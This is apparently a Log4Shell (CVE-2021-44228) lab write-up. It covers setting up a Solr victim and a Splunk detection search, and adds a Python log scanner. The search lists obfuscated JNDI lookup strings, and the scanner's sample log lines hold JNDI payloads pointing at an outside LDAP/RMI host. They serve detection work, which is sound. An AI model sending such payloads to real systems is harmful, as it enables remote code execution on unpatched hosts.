Log4Shell

Introduction

On December 9th, 2021, the world was made aware of a new vulnerability identified as CVE-2021-44228, affecting the Java logging package log4j. This vulnerability earned a severity score of 10.0 (the most critical designation) and allows trivial remote code execution on hosts running software that uses an affected log4j version. This attack has been dubbed "Log4Shell".

Requirements

  1. Kali Linux as attacker.

  2. CentOS with Apache Solr 8.9 or 8.11 as victim.

Prerequisites:

Step 1 – Install Java

The latest version of Apache Solr requires Java 8 or newer to run, so make sure your system meets that requirement. If Java is not installed, or you have Java 11, do the following. This must be done on both machines, CentOS and Kali Linux.

$ sudo mkdir /usr/java
$ cd /usr/java
$ sudo wget https://repo.huaweicloud.com/java/jdk/8u181-b13/jdk-8u181-linux-x64.tar.gz
$ sudo tar xvzf jdk-8u181-linux-x64.tar.gz -C /usr/java
$ JAVA_HOME=/usr/java/jdk1.8.0_181/
$ sudo update-alternatives --install /usr/bin/java java ${JAVA_HOME%*/}/bin/java 20000
$ update-alternatives --config java

You get a selection prompt like the one in the screenshot (figure 1: update-alternatives Java selection).

Step 2 - Install Apache Solr on CentOS 8

Now download the required Solr version. You may use the command below to download Apache Solr 8.9.0 (or 8.11.0), then extract the installer script.

wget https://archive.apache.org/dist/lucene/solr/8.9.0/solr-8.9.0.tgz
sudo tar xzf solr-8.9.0.tgz solr-8.9.0/bin/install_solr_service.sh --strip-components=2

Proof of Concept:

The next question is, where could we enter this syntax?
Anywhere that has data logged by the application.

Testing The Vulnerability

Exploitation:

Detection using Splunk:

index="cp_log" ("2021-44228" OR "Log4j" OR "Log4Shell" OR "%24%7bjndi:" OR "%2524%257Bjndi" OR "%2F%252524%25257Bjndi%3A" OR "%7bjndi:" OR "%7Bjndi:" OR "{base64:JHtqbmRp{env:BARFOO:-j}" OR "{::-j}" OR "{jndi:corba" OR "jndi:dns:/" OR "jndi:iiop" OR "jndi:ldap:/" OR "jndi:ldaps:/" OR "jndi:${lower:" OR "jndi:nds" OR "jndi:nis" OR "jndi:rmi:/" OR "{::-l}${::-d}${::-a}${::-p}" OR "{\:\:-j}")
| convert timeformat="%Y-%m-%d-%H" ctime(_time) AS date
| stats sparkline values(user_agent) count by src_ip, dest_ip, dest_port, date
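The Splunk search above matches each obfuscated spelling of the lookup as a separate literal. The added example below (not code from the original write-up) takes the complementary approach for web server logs: it first undoes the encodings the search enumerates (nested percent-encoding, `${::-x}`, `${lower:x}`, `${env:NAME:-x}`) and then matches a single `${jndi:<scheme>:` pattern. The log lines and IP addresses are constructed samples.

```python
"""Flag obfuscated Log4Shell probes in web server access logs.

Added example, not code from the original write-up. Normalises the
obfuscations listed in the Splunk search (repeated URL encoding and
log4j's ${::-x} / ${lower:x} / ${env:X:-x} lookups), then matches one
pattern. All log lines and addresses below are constructed samples.
"""
import re
from urllib.parse import unquote

# Lookups that log4j 2.x resolves to their (default) argument; this is how
# "jndi" gets spelled as ${::-j}${::-n}${::-d}${::-i} in probes.
_SIMPLE_LOOKUP = re.compile(
    r"\$\{(?:::|lower:|upper:|env:[^:${}]*:)-?([^${}]+)\}", re.I)
# After normalisation a probe reduces to ${jndi:<scheme>:...}
_JNDI = re.compile(r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds|nis):", re.I)


def normalize(text: str, rounds: int = 5) -> str:
    """Undo nested percent-encoding and simple lookups until stable."""
    for _ in range(rounds):
        decoded = _SIMPLE_LOOKUP.sub(lambda m: m.group(1), unquote(text))
        if decoded == text:
            break
        text = decoded
    return text


def scan(log_text: str) -> list:
    """Return (line number, normalized line) for each line carrying a probe."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        norm = normalize(line)
        if _JNDI.search(norm):
            hits.append((number, norm))
    return hits


# Constructed access-log lines: plain, double URL-encoded and
# lookup-obfuscated probes, followed by one benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:10:01:12 +0000] "GET /solr/select?q=${jndi:ldap://198.51.100.7:1389/a} HTTP/1.1" 200 -
10.0.0.5 - - [10/Dec/2021:10:01:13 +0000] "GET /solr/select?q=%2524%257Bjndi%253Aldap%253A%252F%252F198.51.100.7%253A1389%252Fa%257D HTTP/1.1" 200 -
10.0.0.5 - - [10/Dec/2021:10:01:14 +0000] "GET /solr/ HTTP/1.1" 200 - "${${::-j}${::-n}${::-d}${::-i}:${lower:rmi}://198.51.100.7:1099/a}"
10.0.0.9 - - [10/Dec/2021:10:02:00 +0000] "GET /solr/select?q=${price} HTTP/1.1" 200 - "Mozilla/5.0"
"""

if __name__ == "__main__":
    for number, norm in scan(SAMPLE_LOG):
        print(f"line {number}: {norm}")
```

Feed real access logs through `scan()` and review the normalised hits; the source IPs and user agents it surfaces are the values the `stats` clause above groups by.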


Refer: log-jammin-log4j-2-rce

log4shell-detecting-log4j-vulnerability-cve-2021-44228-continued

Mitigation and Prevention:

IPS Blade in Checkpoint Firewall:


For other techniques, you are strongly encouraged to do your own research. There is a significant amount of information being shared in this Reddit thread.

Modify the solr.in.sh file (for solr only):

References: